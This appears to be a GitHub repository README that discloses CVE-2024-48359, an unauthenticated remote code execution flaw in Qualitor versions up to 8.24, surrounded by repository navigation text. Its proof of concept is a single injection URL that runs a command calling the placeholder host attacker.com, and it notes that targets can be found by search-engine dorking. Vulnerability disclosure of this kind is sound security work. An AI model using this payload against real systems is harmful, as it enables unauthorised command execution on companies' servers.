CVE-2024-48359 - Qualitor <= v8.24 Unauthenticated RCE PoC

CVE-2024-48359 | Qualitor <= v8.24 RCE

Description

Qualitor is a platform for business process management, and this system is present in various companies in Brazil that can be identified simply by using Google dorking.

Our team identified a vulnerability in the application susceptible to Remote Code Execution (RCE), which allows remote execution of system commands.

This is an bypass for the CVE-2023-47253 fix.

Proof of Concept (POC)

Just send a PHP code in the page processVariavel.php, ex: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

Researches

https://www.linkedin.com/in/xvinicius/

https://www.linkedin.com/in/hairrison-wenning-4631a4124/

OpenXP Research Team

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2024-48359 - Qualitor <= v8.24 Unauthenticated RCE PoC

Description

Proof of Concept (POC)

Researches

About

Releases

Packages

OpenXP-Research/CVE-2024-48359

Folders and files

Latest commit

History

Repository files navigation

CVE-2024-48359 - Qualitor <= v8.24 Unauthenticated RCE PoC

Description

Proof of Concept (POC)

Researches

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages